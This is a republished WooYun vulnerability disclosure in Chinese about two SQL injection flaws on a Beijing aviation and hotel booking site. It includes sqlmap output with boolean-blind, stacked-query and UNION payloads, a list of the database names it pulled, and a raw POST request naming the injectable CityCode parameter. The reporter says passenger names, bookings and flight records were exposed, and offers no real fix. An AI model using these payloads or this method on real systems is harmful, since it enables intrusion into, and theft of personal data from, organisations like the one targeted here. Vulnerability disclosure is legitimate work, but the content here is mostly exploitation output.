北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

admin
admin
admin
139803
文章
114
评论
2017年4月19日12:06:03评论350 views字数 242阅读0分48秒阅读模式
摘要

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-198192

漏洞标题: 北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

相关厂商: 北京海华航空服务有限公司

漏洞作者: 路人甲

提交时间: 2016-04-19 20:50

公开时间: 2016-06-06 15:30

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 7

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签:

0人收藏

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

RT

详细说明:

注入一:

code 区域 
http://**.**.**.**:80/flight/view_xz.aspx?id=9

注入参数 id

code 区域 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y
 sqlmap identified the following injection point(s) with a total of 54 HTTP(s) request
 ---
 Parameter: id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: id=9 AND 2970=2970
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: id=9;WAITFOR DELAY '0:0:5'--
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 1 column
     Payload: id=-4355 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(1
 ---
 [15:09:21] [INFO] testing Microsoft SQL Server
 [15:09:21] [INFO] confirming Microsoft SQL Server
 [15:09:22] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
 back-end DBMS: Microsoft SQL Server 2008
 [15:09:22] [INFO] testing if current user is DBA
 current user is DBA:    False
 [15:09:22] [INFO] fetching database names
 [15:09:22] [INFO] the SQL query used returns 12 entries
 [15:09:22] [INFO] retrieved: AgentDB
 [15:09:22] [INFO] retrieved: cmymall
 [15:09:23] [INFO] retrieved: cyymall
 [15:09:23] [INFO] retrieved: EMall
 [15:09:23] [INFO] retrieved: ggtvisa_pek
 [15:09:23] [INFO] retrieved: haihua_pek
 [15:09:23] [INFO] retrieved: master
 [15:09:23] [INFO] retrieved: model
 [15:09:23] [INFO] retrieved: msdb
 [15:09:23] [INFO] retrieved: phmall
 [15:09:23] [INFO] retrieved: tempdb
 [15:09:23] [INFO] retrieved: xhmall
 available databases [12]:
 [*] AgentDB
 [*] cmymall
 [*] cyymall
 [*] EMall
 [*] ggtvisa_pek
 [*] haihua_pek
 [*] master
 [*] model
 [*] msdb
 [*] phmall
 [*] tempdb
 [*] xhmall

数据库:

北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

涉及乘客敏感数据 订房信息 航班 姓名 流水号等

北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

数据量较大

注入二:

code 区域 
POST /hotel/searchlist.aspx HTTP/1.1
 Content-Length: 4430
 Content-Type: application/x-www-form-urlencoded
 X-Requested-With: XMLHttpRequest
 Referer: http://**.**.**.**:80/
 Cookie: ASP.NET_SessionId=o0xqncikkbxpowepywua33q1
 Host: **.**.**.**
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
 Accept: */*
 
 CheckInDate=01/01/1967&CheckOutDate=01/01/1967&CityCode=1&CityName=%e5%8c%97%e4%ba%ac&CityRegion=&hfMaxPrice=0&hfMinPrice=0&hfRank=&hfRoomNum=1&hotelid=&icityregion=San%20Francisco&PorName=&roomid=&txtHotelName=fqwnbsni&__EVENTVALIDATION=/wEdAA37b0eO4dRB4UUqB/4w4/pdZHMbe731eFAxuGvO9ZZ5ZZjeo/fMeTXf/QQiPkaixvAL0yspPcNhOVjUIIFayqSOvSPZXSSPF9R2TFrtv5QdaRUeYxuAVINbp58%2bLmZvWWe4Ltm82CeaLS2kIluHCSoRpwz8DLYyF0vx1oqMiiCqXQpWuJlIup7RXShjdkEB6dhdsH75TQ9b%2bD%2b5XWA7Ji/lhBYXRHobukEUNnQb5b%2bL6lvgu/%2bD2STGYjNLjccYZQgKTJ1RHDZtslr6RMNzYdMlyCH0X0ihRti4ONCc7CULX/hkWojwc%2bXeev%2bqP/umvpM%3d&__VIEWSTATE=/wEPDwUJLTI3NDgyMzIyD2QWAgIDD2QWDAIBD2QWCAIDDw8WAh4EVGV4dAUk5YyX5Lqs5rW35Y2O6Iiq56m65pyN5Yqh5pyJ6ZmQ5YWs5Y%2b4ZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCCw8PZBYCHgdvbmNsaWNrBUxqYXZhc2NyaXB0OmFsZXJ0KCfnrqHnkIblkZjnpoHnlKjms6jlhows6K%2b355S16K%2bd6IGU57O75a6i5pyN5Luj5Li65rOo5YaMJyk7ZAINDxYCHwAF0AI8bGk%2bPGEgaHJlZj0iL0ZsaWdodC8iPuWbveWGheacuuelqDwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvRmxpZ2h0X2ludC9nanRpY2tldHMuYXNweCI%2b5Zu96ZmF5py656WoPC9hPjxpIGNsYXNzPSJpY28wMyI%2bPC9pPjwvbGk%2bPGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPuWbveWGhemFkuW6lzwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvdmlzYS8iPuWbvemZheetvuivgTwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48L2xpPjxsaT48YSBocmVmPSIvdHJhaW4vIj7ngavovabnpag8L2E%2bPGkgY2xhc3M9ImljbzA2Ij48L2k%2bPC9saT5kAh8PFgIfAAWTBSA8QSBjbGFzcz1jaGVjayAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJycpOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2b5YWo6YOoPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgICAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzVBJyk7IGhyZWY9amF2YXNjcmlwdDo7PuS6lOaYn%2be6pzwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnNEEnKTsgaHJlZj1qYXZhc2NyaXB0Ojs%2b5Zub5pif57qnPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhbmsnLCczQScpOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2b5LiJ5pif57qnPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzJBJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuozmmJ/nuqc8L0E%2bIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzFBJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuIDmmJ/nuqc8L0E%2bZAIhDxYCHwAFuAQgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzVTJyk7IGhyZWY9amF2YXNjcmlwdDo7PuS6lOWHhuaYn%2be6py/osarljY48L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSAgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhbmsnLCc0UycpOyBocmVmPWphdmFzY3JpcHQ6Oz7lm5vlh4bmmJ/nuqcv6auY5qGjPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnM1MnKTsgIGhyZWY9amF2YXNjcmlwdDo7PuS4ieWHhuaYn%2be6pzwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYW5rJywnMlMnKTsgIGhyZWY9amF2YXNjcmlwdDo7PuS6jOWHhuaYn%2be6pzwvQT4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSAgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmFuaycsJzFTJyk7ICBocmVmPWphdmFzY3JpcHQ6Oz7kuIDlh4bmmJ/nuqc8L0E%2bZAIjDxYCHwAF7wUgIDxBIGNsYXNzPWNoZWNrIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDAsMCk7ICBocmVmPWphdmFzY3JpcHQ6Oz7lhajpg6g8L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDEsMTUwKTsgaHJlZj1qYXZhc2NyaXB0Ojs%2bwqUxNTDku6XkuIs8L0E%2bDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxBICBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYXRlJywxNTEsMzAwKTsgIGhyZWY9amF2YXNjcmlwdDo7PsKlMTUxLTMwMDwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgIG9uY2xpY2s9amF2YXNjcmlwdDpzZXRob3RlbHBhcmEoJ3JhdGUnLDMwMSw0NTApOyAgaHJlZj1qYXZhc2NyaXB0Ojs%2bwqUzMDEtNDUwPC9BPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8QSBvbmNsaWNrPWphdmFzY3JpcHQ6c2V0aG90ZWxwYXJhKCdyYXRlJyw0NTEsNjAwKTsgIGhyZWY9amF2YXNjcmlwdDo7PsKlNDUxLTYwMDwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPEEgb25jbGljaz1qYXZhc2NyaXB0OnNldGhvdGVscGFyYSgncmF0ZScsNjAxLDApOyBocmVmPWphdmFzY3JpcHQ6Oz7CpTYwMOS7peS4ijwvQT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZAInDxYCHwBlZAIpD2QWBgIBDw8WAh8ABTVDb3B5cmlnaHQgwqkgMjAxNCB3d3cuaC1oLmNvbS5jbiBhbGwgcmlnaHRzIHJlc2VydmVkLmRkAgMPDxYCHwAFNOWcsOWdgO%2b8muWMl%2bS6rOW4guS4nOWfjuWMuuWuieW%2bt%2bi3r%2beUsjEw5Y%2b3NS0xMDXlrqRkZAIFDw8WAh8ABRXnlLXor53vvJowMTAtNTE2NjIzNTVkZGQ/m30xxrIB2oaIjvZTY1s/inArXN8n7pub1MP3XwZgLg%3d%3d&__VIEWSTATEGENERATOR=41450651

注入参数 CityCode

注入结果:

北京海华航空服务有限公司两个注入打包提交(涉及乘客敏感数据)

漏洞证明:

太慢 不跑了

数据量还是蛮大的

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-22 15:28

厂商回复:

CNVD未复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin